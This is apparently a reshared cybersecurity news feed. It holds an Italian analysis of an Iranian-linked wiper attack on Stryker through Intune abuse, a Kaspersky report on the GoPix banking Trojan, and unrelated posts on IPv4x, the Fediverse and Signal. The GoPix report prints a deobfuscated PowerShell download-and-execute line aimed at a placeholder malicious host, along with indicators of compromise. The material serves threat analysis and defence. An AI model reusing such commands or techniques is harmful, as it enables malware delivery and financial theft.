Per capire perché questo incidente pesa più di altri sul piano strategico bisogna partire dal contesto geopolitico. Handala rivendica l’operazione come ritorsione per l’attacco contro la scuola di Minab in Iran, incastonandola in un ciclo di escalation che vede Stati Uniti e Israele da un lato e Teheran dall’altro, con il cyber come teatro operativo ormai pienamente integrato in quello cinetico. Sullo sfondo c’è il ruolo del Corpo delle Guardie Rivoluzionarie Islamiche (IRGC), che tramite media di Stato come l’agenzia Tasnim ha iniziato a pubblicare liste di “obiettivi legittimi” tra le big tech occidentali, indicando strutture di Google, Microsoft, Nvidia, IBM, Oracle, Palantir e Amazon in Israele e nel Golfo come possibili target di future azioni di “infrastructure warfare”. In questo schema, colpire un fornitore medicale come Stryker non è solo un’operazione di sabotaggio episodica, ma un messaggio: l’Iran‑verse cyber non si limita più a entità governative o utility regionali, può aggredire nodi sistemici della sanità globale e disarticolare la capacità operativa degli ospedali occidentali senza toccare direttamente i loro sistemi clinici.

Dal punto di vista tecnico, il quadro che emerge secondo diverse fonti di cyber intelligence è quello di un’operazione costruita intorno a un wiper, o comunque a un effetto wiper‑like, con un’architettura pensata per massimizzare la distruzione più che l’estorsione. A differenza del classico schema ransomware – cifratura, nota di riscatto, canale di negoziazione – qui il focus è la cancellazione irreversibile dei dati sui sistemi aziendali, l’arresto forzato della produzione, il lock‑out degli utenti dalle applicazioni critiche. Nelle prime ore Stryker ha parlato di impatto confinato all’ecosistema Microsoft, ma i report descrivono un effetto domino su più regioni, dal quartier generale europeo in Irlanda agli stabilimenti di produzione in Nord America e Asia, con shutdown degli ambienti industriali, perdita dei canali di comunicazione interna e cancellazione remota degli endpoint gestiti via MDM.

Il passaggio chiave è il controllo dell’infrastruttura di gestione centralizzata. Yellow Phobos è noto per un modus operandi identity‑centric: phishing mirato, furto di credenziali, abuso di account validi, focus su Microsoft Entra ID e Microsoft 365, e pivot sugli strumenti di orchestrazione come Intune, automazioni Azure o Group Policy per scalare rapidamente i privilegi dentro il tenant. Nel caso Stryker, fonti vicine all’indagine hanno raccontato come il gruppo non avrebbe necessariamente spinto un eseguibile wiper classico, ma sfruttato la console Intune per emettere comandi di remote wipe e factory reset verso qualsiasi dispositivo associato al profilo aziendale, inclusi i telefoni personali BYOD con un work profile. Il risultato è un “wiper as a feature”: invece di un malware che sovrascrive i settori del disco, una tempesta di azioni amministrative legittime ma concatenate per ottenere lo stesso esito, con un livello di tracciabilità e attribuzione ancora più insidioso perché si confonde con l’attività di gestione quotidiana.

Questo approccio è perfettamente coerente con le TTP mappate nel framework MITRE ATT&CK per Handala / Yellow Phobos negli ultimi anni. Sul fronte dell’accesso iniziale, il gruppo ha storicamente combinato spear phishing (T1566) con l’exploitation di servizi esposti (T1190) e il riuso di account validi (T1078), spesso attraverso campagne di brand impersonation che mimano attori fidati come provider di sicurezza o vendor IT per indurre l’utente a consegnare credenziali o token. Una volta dentro, la persistenza passa attraverso l’abuso sistematico di account amministrativi compromessi, l’uso estensivo di interpreter di scripting e strumenti nativi (T1059) e l’escalation via exploitation di vulnerabilità note (T1068), con il movimento laterale orchestrato tramite servizi remoti (T1021) e alternate authentication material (T1550) per attraversare velocemente boundary logici e geografici. L’impatto, come dimostra il caso Stryker, è centrato su data destruction (T1485), endpoint DoS (T1499) e defacement (T1491), con i portali di autenticazione brandizzati Handala a sigillare visivamente la presa di controllo dell’infrastruttura.

Un altro elemento non trascurabile è il ruolo delle identità hacktiviste multiple che orbitano intorno a Yellow Phobos. Handala Hack è solo una delle maschere: le cronache degli ultimi anni hanno già visto Homeland Justice rivendicare operazioni distruttive contro il governo albanese, compresa la compromissione dei sistemi email del parlamento con conseguente sospensione dei servizi, mentre Anonymous for Justice ha firmato presunti wiping contro target israeliani nei settori legale, utilities e servizi finanziari. La logica è quella di una franchising strategy ideologica: nomi e logo cambiano a seconda del messaggio politico e del teatro operativo, ma le infrastrutture, le toolchain e il know‑how restano nelle mani dello stesso cluster operativo legato all’apparato di sicurezza iraniano. Per chi difende, questo rende meno utile concentrarsi sulla “sigla” e obbliga a riconoscere pattern tecnici ricorrenti, come l’abuso di provider di cloud occidentali, il riciclo creativo di domini typo‑squatting e un elenco crescente di IoC che spaziano da indirizzi IP a domini come handala‑hack.to, justicehomeland.* e una lunga serie di pseudo‑brand di big tech usati per phishing e comando e controllo.

Sul terreno, l’effetto dell’attacco è stato immediato anche fuori da Stryker. In Australia, ad esempio, le autorità sanitarie hanno messo in stato di allerta gli ospedali che dipendono da dispositivi e impianti Stryker, consapevoli che una disruption prolungata nella catena di fornitura può tradursi in ritardi nelle procedure chirurgiche, difficoltà nella manutenzione e nei richiami di sicurezza dei device. Al di là del singolo caso, il messaggio per il settore healthcare è che la resilienza non può essere pensata solo dentro il perimetro ospedaliero: un wiper‑driven incident su un player di medtech upstream può avere un impatto sistemico paragonabile a un attacco diretto a un grande ospedale universitario o a una centrale elettrica regionale.

Guardando oltre il perimetro sanitario, l’elenco di minacce diffuse dall’IRGC contro data center e uffici di big tech nel Golfo e in Israele apre un fronte nuovo, in cui i cloud provider e i grandi vendor di AI, storage e analytics non sono più solo infrastrutture di riferimento ma target dichiarati di operazioni di “infrastructure warfare”. Gli episodi recenti che citano attacchi con droni contro data center AWS negli Emirati Arabi Uniti e in Bahrain – ancora da chiarire nei dettagli tecnici – confermano che il confine tra attacco fisico e attacco logico si va sfumando: la stessa facility può finire in un rapporto di intelligence come potenziale obiettivo cinetico e, contemporaneamente, come nodo da degradare via campagne cyber destruttive o di preposizionamento.

All’interno di un’azienda, ente o organizzazione con footprint cloud esteso e dipendenza strutturale da ambienti Microsoft, la lezione del caso Stryker è tanto banale quanto scomoda: la tua superficie d’attacco più critica non è solo l’ennesimo zero‑day, ma il layer di identity e di gestione centralizzata che hai costruito per semplificarti la vita. La strategia di mitigazione descritta – MFA ovunque, soprattutto sugli account privilegiati, principle of least privilege spinto sulle console amministrative, PAM per isolare e tracciare l’uso delle credenziali ad alto impatto, RBAC rigoroso sui sistemi di endpoint management, EDR e SIEM con regole specifiche per rilevare movimenti laterali e azioni massive di wipe/reset – non è più “best practice”, è la baseline minima per sopravvivere a un avversario che ha dimostrato di saper trasformare Intune nel proprio wiper distribuito. L’altro pezzo del puzzle è la preparedness: backup offline e immutabili delle configurazioni critiche, runbook di incident response che contemplino la perdita simultanea di migliaia di endpoint, canali di comunicazione fuori banda pronti per quando la posta e i sistemi di messaggistica aziendale spariscono in un colpo solo.

In prospettiva, il caso Stryker rischia di essere ricordato come uno spartiacque, non tanto per la tecnologia impiegata – nessun exploit miracoloso, nessun malware da collezione – ma per il salto concettuale nell’abuso delle piattaforme di gestione cloud come arma di distruzione su larga scala. È un modello replicabile, economicamente efficiente per l’attaccante e perfettamente allineato a una dottrina in cui il cyber non serve solo a rubare dati o a fare pressione tramite estorsione, ma a erodere la capacità industriale e la fiducia nelle infrastrutture digitali dei Paesi avversari.


reshared this

The era of kids social media bans is upon us


The media in this post is not displayed to visitors. To view it, please log in.

The era of kids social media bans is upon us
IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and I'll be speaking at the annual CPDP conference in Brussels in May about how to boost researchers' access to social media data in the name of platform governance. If that's your bag, come say hello here.

— Countries are barreling ahead with kids' social media bans without assessing the evidence and failing to understand the likely collateral damage.

– Canada offers an example of how a so-called Middle Power can both increase its digital sovereignty without cutting itself off from the global tech community.

— Europe's national agencies in charge of the Digital Services Act come from markedly different regulatory traditions.

Let's get started:



digitalpolitics.co/newsletter0…

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Red Hot Cyber Conference 2026: al via le iscrizioni all’evento cyber più atteso dell’anno

📌 Link all'articolo : redhotcyber.com/post/red-hot-c…

#redhotcyber #news #redhotcyberconference #cybersecurity #hacking #romacongressi #eventbrite

Free real estate: GoPix, the banking Trojan living off your memory


The media in this post is not displayed to visitors. To view it, please log in.


Introduction


GoPix is an advanced persistent threat targeting Brazilian financial institutions’ customers and cryptocurrency users. It represents an evolved threat targeting internet banking users through memory-only implants and obfuscated PowerShell scripts. It evolved from the RAT and Automated Transfer System (ATS) threats that were used in other malware campaigns into a unique threat never seen before. Operating as a LOLBin (Living-off-the-Land Binary), GoPix exemplifies a sophisticated approach that integrates malvertising vectors via platforms such as Google Ads to compromise prominent financial institutions’ customers.

Our extensive analysis reveals GoPix’s capabilities to execute man-in-the-middle attacks, monitor Pix transactions, Boleto slips, and manipulate cryptocurrency transactions. The malware strategically bypasses security measures implemented by financial institutions while maintaining persistence and employing robust cleanup mechanisms to challenge Digital Forensics and Incident Response (DFIR) efforts.

GoPix has reached a level of sophistication never before seen in malware originating in Brazil. It’s been over three years since we first identified it, and it remains highly active. The threat is recognized for its stealthy methods of infecting victims and evading detection by security software, using new tricks to stay operable.

The threat differs in its behavior from the RATs already seen in other Brazilian families, such as Grandoreiro. GoPix uses C2s with a very short lifespan, which stay online only for a few hours. In addition, the attackers behind this threat abuse legitimate anti-fraud and reputation services to perform targeted delivery of its payload and ensure that they have not infected a sandbox or system used in analysis. They handpick their victims, financial bodies of state governments and large corporations.

The campaign leverages a malvertisement technique which has been active since December 2022. The strategic use of multiple obfuscation layers and a stolen code signing certificate showcases GoPix’s ability to evade traditional security defenses and steal and manipulate sensitive financial data.

The Brazilian group behind GoPix is clearly learning from APT groups to make malware persistent and hide it, loading its modules into memory, keeping few artifacts on disk, and making hunting with YARA rules ineffective for capturing them. The malware can also switch between processes for specific functionalities, potentially disabling security software, as well as executing a man-in-the-middle attack with a previously unseen technique.

Initial infection


Initial infection is achieved through malvertising campaigns. The threat actors in most cases use Google Ads to spread baits related to popular services like WhatsApp, Google Chrome, and the Brazilian postal service Correios and lure victims to malicious landing pages.

We have been monitoring this threat since 2023, and it continues to be very active for the time being.

GoPix malware campaign detections (download)

The initial infection vector is shown below:

Initial infection vector
Initial infection vector

When the user ends up on the GoPix landing page, the malware abuses legitimate IP scoring systems to determine whether the user is a target of interest or a bot running in malware analysis environments. The initial scoring is done through a legitimate anti-fraud service, with a number of browser and environment parameters sent to this service, which returns a request ID. The malicious website uses this ID to check whether the user should receive the malicious installer or be redirected to a harmless dummy landing page. If the user is not considered a valuable target, no malware is delivered.

Website shown if the user is detected as a bot or sandbox
Website shown if the user is detected as a bot or sandbox

However, if the victim passes the bot check, the malicious website will query the check.php endpoint, which will then return a JSON response with two URLs:

JSON response from a malicious endpoint
JSON response from a malicious endpoint

The victim will then be presented with a fake webpage offering to download advertised software, this being the malicious “WhatsApp Web installer” in the case at hand. To decide which URL the victim will be redirected to, another check happens in the JavaScript code for whether the 27275 port is open on localhost.

WebSocket request to check if the port is open
WebSocket request to check if the port is open

This port is used by the Avast Safe Banking feature, present in many Avast products, which are very popular in countries like Brazil. If the port is open, the victim is led to download the first-stage payload from the second URL (url2). It is a ZIP file containing an LNK file with an obfuscated PowerShell designed to download the next stage. If the port is closed, the victim is redirected to the first URL (url), which offers to download a fake WhatsApp executable NSIS installer.
At first, we thought this detection could lead the victim to a potential exploit. However, during our research, we discovered that the only difference was that if Avast was installed, the victim was led to another infection vector, which we describe below.

Malware delivered through a malicious website
Malware delivered through a malicious website

Infection chain

First-stage payload


If no Avast solution is installed, an executable NSIS installer file is delivered to the victim’s device. The attackers change this installer frequently to avoid detection. It’s digitally signed with a stolen code signing certificate issued to “PLK Management Limited”, also used to sign the legitimate “Driver Easy Pro” software.

Stolen certificate used to sign the malicious installer
Stolen certificate used to sign the malicious installer

The purpose of the NSIS installer is to create and run an obfuscated batch file, which will use PowerShell to make a request to the malicious website for the next-stage payload.

NSIS installer code creating a batch file
NSIS installer code creating a batch file

However, if the 27275 port is open, indicating the victim has an Avast product installed, the infection happens through the second URL. The victim is led to download a ZIP file with an LNK file inside. This shortcut file contains an obfuscated command line.

Obfuscated command line inside the LNK
Obfuscated command line inside the LNK

Deobfuscated command line:
WindowsPowerShell\v10\powershell (New-Object NetWebClient)UploadString("http://MALICIOUS/1/","tHSb")|$env:E -
The purpose of this command line is to download and execute the next-stage payload from the malicious URL referenced above.

It’s highly likely this method is used because Avast Safe Browser blocks direct downloads of executable files, so instead of downloading the executable NSIS installer, a ZIP file is delivered.

Once the PowerShell command from either the LNK or EXE file is executed, GoPix executes yet another obfuscated PowerShell script that is remotely retrieved (in the GoPix downloader image below, it’s defined as “PowerShell Script”).

GoPix delivery chain
GoPix delivery chain

Initial PowerShell script


This script’s purpose is to collect system information and send it to the GoPix C2. Upon doing so, the script obtains a JSON file containing GoPix modules and a configuration that is saved on the victim’s computer.

System information collection
System information collection

The information contained within this JSON is as follows:

  • Folder and file names to be created under the %APPDATA% directory
  • Obfuscated PowerShell script
  • Encrypted PowerShell script ps
  • Malicious code implant sc containing encrypted GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix implant
  • GoPix configuration file pf

Once these files are saved, an additional batch file is also created and executed. Its purpose is to launch the obfuscated PowerShell script.
PSExecutionPolicyPreference=Unrestricted
powershell -File "$scriptPath"
exit

Obfuscated PowerShell script


Upon execution, the obfuscated PowerShell script decrypts the encrypted PowerShell script ps, starts another PowerShell instance, and passes the decrypted script through its stdin, so that the decrypted script is never loaded to disk.

Deobfuscated PowerShell script
Deobfuscated PowerShell script

Decrypted PowerShell script “ps”


The purpose of this memory-only PowerShell script is to perform an in-memory decryption of the GoPix dropper shellcode, GoPix dropper, main payload shellcode and main GoPix malware implant into allocated memory. After that, it creates a small piece of shellcode within the PowerShell process to jump to the GoPix dropper shellcode previously decrypted.

PowerShell script shellcode jumps to the malware loader shellcode
PowerShell script shellcode jumps to the malware loader shellcode

The GoPix dropper shellcode is built for either the x86 or x64 architecture, depending on the victim’s computer.

Building the GoPix shellcode depending on the targeted architecture
Building the GoPix shellcode depending on the targeted architecture

Shellcode


This shellcode is bundled with the malware and stays in encrypted form on disk. It is utilized at two separate stages of the infection chain: first to launch the GoPix dropper and subsequently to execute the main GoPix malware. We’ve observed two versions of this shellcode. The main difference is the old one resolves API addresses by their names, while the latest one employs a hashing algorithm to determine the address of a given API. The API hash calculation begins by generating a hash for the DLL name, and this resulting hash is then used within the function name to compute the final API hash.

The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique
The old sample (left) used stack strings with API names. The new sample (right) uses the API hashing obfuscation technique

The first time GoPix is dropped into memory through PowerShell, its structure is as follows:

  1. Memory dropper shellcode
  2. Memory dropper DLL
  3. Main payload shellcode
  4. Main payload DLL

Both DLLs have their MZ signature erased, which helps to evade detection by memory dumping tools that scan for PE files in memory.

MZ signature zeroed
MZ signature zeroed

GoPix dropper


When the main function from the dropper is called, it verifies if it is running within an Explorer.exe process; if not, it will terminate. It then sequentially checks for installed browsers — Chrome, Firefox, Edge, and Opera — retrieving the full path of the first detected browser from the registry key SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths. A significant difference from previously analyzed droppers is that this version encrypts each string using a unique algorithm.

After selecting the browser, the dropper uses direct syscalls to launch the chosen browser process in a suspended state. This allows it to inject the main GoPix shellcode and its parameters into the process. The injected shellcode is tasked with extracting and loading the main GoPix implant directly into memory, subsequently calling its exported main function. The parameters passed include the number 1, to trigger the main GoPix function, and the current Process ID, which is that of Explorer.exe.

The dropper uses a syscall instruction and calls the GoPix in-memory implant's main function
The dropper uses a syscall instruction and calls the GoPix in-memory implant’s main function

Main GoPix implant

Clipboard stealing functionality


Boleto bancário was added as one of the targets to the malware’s clipboard stealing and replacing feature. Boleto is a popular payment method in Brazil that functions similarly to an invoice, being the second most popular payment system in the country. It is a standardized document that includes important payment information such as the amount due, due date, and details of the payee. It features a typeable line, which is a sequence of numbers that can be entered in online banking applications to pay. This line is what GoPix targets with its functionality. An example of such a line is “23790.12345 60000.123456 78901.234567 8 76540000010000”.

Boleto bancário targeted in clipboard-stealing functionality
Boleto bancário targeted in clipboard-stealing functionality

When GoPix detects a Pix or Boleto transaction, it simply sends this information to the C2. However, when a Bitcoin or Ethereum wallet is copied to the clipboard, the malware replaces the address with one belonging to the threat actor.

Unique man-in-the-middle attack


PAC (Proxy AutoConfig) files are nothing new; they’ve been used by Brazilian criminals for over two decades, but GoPix takes this to another level. While in the past, criminals used PAC files to redirect victims to a fake phishing page, the purpose of the PAC file in GoPix attacks is to manipulate the traffic while the user navigates the legitimate financial website.

In order to hide which site GoPix wants to intercept, it uses a CRC32 algorithm in the host field of the PAC file. It is formatted on the fly using a pf configuration file: the items in it determine which proxy the victim will be redirected to. To hide its malicious proxy server, once a connection is opened to the proxy server, the malware enumerates all connections and finds the process that initiated it. It then takes the process executable name CRC32C checksum and compares it with a hardcoded list of browsers’ CRC checksums. If it doesn’t match a known browser, the malware simply terminates the connection.

PAC file excerpt
PAC file excerpt

To uncover GoPix targets, we compiled a list of many Brazilian financial institution domains and subdomains, computed their CRC32 checksums, and compared them against GoPix hardcoded values. The table below shows each CRC32 and its target.

CRC32Target
8BD688E8local
8CA8ACFFwww2.banco********.com.br
AD8F5213autoatendimento.********.com.br
105A3F17www2.****.com.br
B477FE70internetbanking.*******.gov.br
785F39C2loginx.********.br
C72C8593internetpf.*****.com.br
75E3C3BAinternet.*****.com.br
FD4E6024internetbanking.*******.com.br
HTTPS interception


Since every communication is encrypted via HTTPS, GoPix bypasses this by injecting a trusted root certificate into the memory of a web browser while on the victim’s machine. This allows the attacker to sniff and even manipulate the victim’s traffic. We have found two certificates across GoPix samples, one that expired in January 2025 and another created in February 2025 that is set to expire in February 2027.

GoPix trusted root certificate
GoPix trusted root certificate

Conclusion


With the ability to load its memory-only implant that employs a malicious Proxy AutoConfig (PAC) file and an HTTP server to execute an unprecedented man-in-the-middle attack, GoPix is by far the most advanced banking Trojan of Brazilian origin. The injection of a trusted root certificate into the browser enhances its ability to intercept and manipulate sensitive financial data while maintaining its stealth profile, as the malicious certificate is not visible to operating system tools. Additionally, GoPix has expanded its clipboard monitoring capability by adding Boleto slips to its arsenal, which already includes Pix transactions and cryptowallets addresses.

This is a sophisticated threat, with multiple layers of evasion, persistence, and functionality. The investigation into the malware’s shellcode, dropper, and main module uncovered intricate mechanisms, including process jumping to leverage specific functionalities across processes. This technique, combined with robust string encryption methods applied to both the dropper and main payload, indicates that the threat actor has gone to great lengths to hinder detection. Interestingly enough, attackers adopted the use of a legitimate commercial anti-fraud service to pre-qualify their targets, aiming to avoid sandboxes and security researchers’ investigations. Additionally, the persistence and cleanup mechanisms implemented by the malware enhance its durability during incident response efforts, with very short C2 lifespans.

For further information on GoPix and all technical details, please contact crimewareintel@kaspersky.com.

Kaspersky’s products detect this threat as HEUR:Trojan-Banker.Win64.GoPix, Trojan.PowerShell.GoPix, and HEUR:Trojan-Banker.OLE2.GoPix.

Indicators of compromise


EB0B4E35A2BA442821E28D617DD2DAA2 – NSIS installer
C64AE7C50394799CE02E97288A12FFF – ZIP archive with an LNK file
D3A17CB4CDBA724A0021F5076B33A103 – Malware dropper
28C314ACC587F1EA5C5666E935DB716C – Main payload

Malicious Certificate Thumbprint
<Name(CN=Root CA 2024)> f110d0bd7f3bd1c7b276dc78154dd21eef953384
<Name(CN=Root CA 2025)> 1b1f85b68e6c9fde709d975a186185c94c0faa51

C2
paletolife[.]com

Domains and IPs
https://correioez0ubcfht9i3.lovehomely[.]com/
https://correiotwknx9gu315h.lovehomely[.]com/
http://webmensagens4bb7[.]com/
https://mydigitalrevival[.]com/get.php
http://b3d0[.]com/1/
http://4a3d[.]com/1/
http://9de1[.]com/1/
http://ef0h[.]com/1/
http://yogarecap[.]com/1/


securelist.com/gopix-banking-t…

The IPV4 We Didn’t Get


The media in this post is not displayed to visitors. To view it, please log in.

If you have ever read science fiction, you’ve probably seen “alternate history” stories. You know, where Europeans didn’t discover the New World until the 19th century, or the ancient Egyptians stumbled upon electricity. Maybe those things happened in an alternate universe. [BillPG] has an alternate history tale for us that imagines IPv6 was shot down and a protocol called IPv4x became prominent instead.

The key idea is that in 1993, the IP-Next-Generation working group could have decided that any solution that would break the existing network wouldn’t work. There is precedent. Stereo records play on mono players and vice versa. Color TV signals play on black and white sets just as well as black and white signals play on color TVs. It would have made perfect sense.

How could this be? The idea was to make everyone who “owns” an IPv4 address the stewards of a 96-bit sub-address block. IPv4x-aware equipment extracts the entire 128-bit address. IPv4-only equipment routes the packet to the controlling IPv4 address. Wasteful? Sure. Most people don’t need 79 octillion addresses. But if everyone has that many, then why not?

The fictional timeline has DNS and DHCP, along with dial-up stacks, changing to accommodate the new addresses. Again, you had to assume some parts of the network were still IPv4-only. DNS would return both addresses, and it was up to you to pick the IPv4x address if you understood it.

Your ISP would probably not offer you the entire extra space. A regional router could handle all traffic for your neighborhood and then direct it to your specific 128-bit address or your pool of addresses, if you have multiple devices. No need for NAT to hide your devices, nor strange router configurations to punch traffic through.

Of course, back in the real world, we have two incompatible systems: IPv4 and IPv6. IPv6 adoption has been slow and painful. We wondered why [BillPG] wrote about this future that never was. Turns out, he’s proposed a gateway that IPv6 hosts can provide to allow access from IPv4-only networks. Pretty sneaky, but we can admire it. If reading all this makes you wonder what happened to IPv5, we wondered that, too.


hackaday.com/2026/03/16/the-ip…

Cybersecurity & cyberwarfare ha ricondiviso questo.

Apertura, trasparenza e portata: tre motivi per cui le istituzioni pubbliche dovrebbero abbracciare il Fediverso.

«Oggi più che mai, l'Europa ha bisogno di una piattaforma di comunicazione pubblica e aperta, accessibile a tutti i cittadini, senza necessità di registrazione; una rete indipendente non soggetta a censura dovuta ad algoritmi opachi o pregiudizi politici»

blog.elenarossini.com/openness…

@fediverso

Il post di @_elena
mastodon.social/@_elena/116238…


📝 New post 🚀

"Openness, transparency and reach: three reasons why public institutions should embrace the Fediverse"

🔗 : blog.elenarossini.com/openness…

mentioning @europeanspodcast @haubles @aral @Gargron @tferrer @rstockm @samvie @EUCommission

#SocialMedia #FOSS #DigitalSovereignty #SocialSovereignty #policy #BigTech #Fediverse #TheFutureIsFederated #RSS #SocialWeb


Unknown parent

mastodon - Collegamento all'originale

informapirata ⁂

The media in this post is not displayed to visitors. To view it, please go to the original post.

fatto!

informapirata.it/2026/03/16/ar…

@ed @fediverso


Architettura aperta, trasparenza e portata: i tre motivi per cui le istituzioni pubbliche dovrebbero abbracciare il Fediverso (il post di Elena Rossini)

«Oggi più che mai, l’Europa ha bisogno di una piattaforma di comunicazione pubblica e aperta, accessibile a tutti i cittadini, senza necessità di registrazione; una rete indipendente non soggetta a censura dovuta ad algoritmi opachi o pregiudizi politici»
informapirata.it/2026/03/16/ar…


Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

Dai paladini della libertà di espressione è tutto, a voi studio
in reply to quinta - Stefano Quintarelli

Per fortuna in Italia non sta succedendo niente di simil...oh wait

ilpost.it/charlie/chi-sono-gli…
(Dal Post articolo sugli scenari che si stanno aprendo per le proprietà dei maggiori quotidiani italiani)

(Per le TV siamo stati apripista, sui social ci pensa Trump anche per noi)

Questa voce è stata modificata (2 settimane fa)
Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

The media in this post is not displayed to visitors. To view it, please go to the original post.

invito al laboratorio online di scrittura poetica di centroscritture.it, tutti i lunedì sera da oggi, 16 marzo youtube.com/watch?v=cmavUHZKA5… slowforward.net/2026/03/16/inv…


invito al laboratorio online di scrittura poetica di centroscritture.it, tutti i lunedì sera da oggi, 16 marzo

centroscritture.it/service-pag…


*

Videopresentazione del Laboratorio in partenza oggi
[ma le iscrizioni sono aperte ancora per i prossimi giorni]

[youtube youtube.com/watch?v=cmavUHZKA5…]

Nuovo laboratorio online di scrittura poetica, quinta edizione, in partenza – con un primo incontro introduttivo – oggi, lunedì 16 marzo 2026. I materiali che ciascun partecipante di volta in volta realizzerà nelle prossime settimane – ossia nel corso del Laboratorio – saranno poi accolti in un volume antologico pubblicato da ECS – Edizioni del CentroScritture.
#CentroScritture #centroscrittureIt #iscrizioniAncoraAperte #iscrizioniAperte #laboratorioAperto #laboratorioDiScritturaPoetica #laboratorioOnlineDiScritturaPoetica #laboratorioOrizzontale #MarcoGiovenale #poesia #scritturaPoetica #ValerioMassaroni


reshared this

Cybersecurity & cyberwarfare ha ricondiviso questo.

Buzzfeed journey:

- Successful
- Pivoted to GenAI for content
- Laid everybody off
- Now admits it probably can't stay in business

futurism.com/artificial-intell…

Cybersecurity & cyberwarfare ha ricondiviso questo.

non ci sono più le spie di una volta
Cybersecurity & cyberwarfare ha ricondiviso questo.

Signal 8.3 beta: le etichette nei gruppi tornano con permessi granulari


Signal 8.3 beta per Android reintroduce le etichette dei membri nei gruppi con un permesso dedicato: ora si può scegliere se modificarle solo gli admin o tutti.
The media in this post is not displayed to visitors. To view it, please go to the original post.

Le etichette personalizzate per i membri dei gruppi su Signal sono apparse poche settimane fa ma con un limite evidente: non c’era modo di controllare chi potesse modificarle. Con la beta 8.3 per Android quel limite sparisce. Adesso gli amministratori del gruppo possono scegliere se il permesso di cambiare le etichette spetta solo a loro oppure a tutti i partecipanti, esattamente come già funziona per altre impostazioni di gruppo.

È una piccola cosa, ma fa differenza in contesti dove i gruppi Signal vengono usati in modo strutturato, per esempio in team di lavoro o comunità organizzate.

Il resto della beta è fatto soprattutto di correzioni: i messaggi ora vengono marcati come letti anche nella modalità a doppio pannello, è stato risolto un crash per le chiamate in arrivo quando l’app gira negli spazi privati di Android, e le GIF tornano ad animarsi correttamente dopo essere usciti dal visualizzatore multimediale. C’è anche un avviso che compare quando si tenta di salvare contenuti in qualità ridotta, così l’utente sa cosa sta scaricando prima di farlo.

Chi usa Obtanium per gestire gli aggiornamenti di Signal al di fuori del Play Store deve abilitare i tag pre-release per ricevere la beta.


FONTE community.signalusers.org

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

L’AI cambia il panorama del pentesting: XBOW Benchmark misura le capacità dei tool agentici

📌 Link all'articolo : redhotcyber.com/post/lai-cambi…

#redhotcyber #news #pentesting #sicurezzainformatica #llm #intelligenzaartificiale #automazione #sicurezzaoffensiva

Cybersecurity & cyberwarfare ha ricondiviso questo.

The media in this post is not displayed to visitors. To view it, please go to the original post.

🚀 TRA POCHI GIORNI AL VIA IL CORSO "𝗖𝗬𝗕𝗘𝗥 𝗢𝗙𝗙𝗘𝗡𝗦𝗜𝗩𝗘 𝗙𝗨𝗡𝗗𝗔𝗠𝗘𝗡𝗧𝗔𝗟𝗦" 🚀

🔗 Programma redhotcyber.com/linksSk2L/cybe…
🔗 Introduzione al corso youtube.com/watch?v=0y4GYsJMoX…
🔗 Webinar introduttivo youtube.com/watch?v=z92gaV2zgN…

📌40 Ore di formazione, partendo dalle basi, sarai guidato da un professore esperto. Non imparerai solo a usare i tool, ma a ragionare come un esperto di sicurezza.

✅Lezioni in diretta e supervisionate (niente video preregistrati abbandonati a metà).
✅Laboratori pratici su ambienti reali.
✅Un percorso strutturato per chi parte da zero.

Prezzi imbattibili.

Info 📞 379 163 8765 ✉️ formazione@redhotcyber.com

#redhotcyber #formazione #pentesting #pentest #formazionelive #ethicalhacking #hacking #cybersecurity #penetrationtesting #cti #cybercrime #infosec #corsi #liveclass #hackerhood #pentesting